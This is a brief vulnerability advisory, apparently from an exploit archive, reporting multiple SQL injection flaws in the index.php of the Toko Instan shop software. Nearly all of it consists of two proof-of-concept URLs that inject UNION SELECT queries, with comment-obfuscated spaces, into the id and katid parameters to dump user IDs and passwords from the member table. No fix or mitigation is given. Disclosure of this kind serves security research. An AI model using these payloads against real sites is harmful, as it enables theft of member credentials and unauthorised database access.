Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities

Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?cm=artikel&cp=show&id=-1/**/union/**/select/**/null,null,null,null,null,userid,password,null,null/**/from/**/member/*
http://www.example.com/index.php?cm=produk&cp=show&katid=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,concat(userid,0x3a,password)/**/from/**/member/*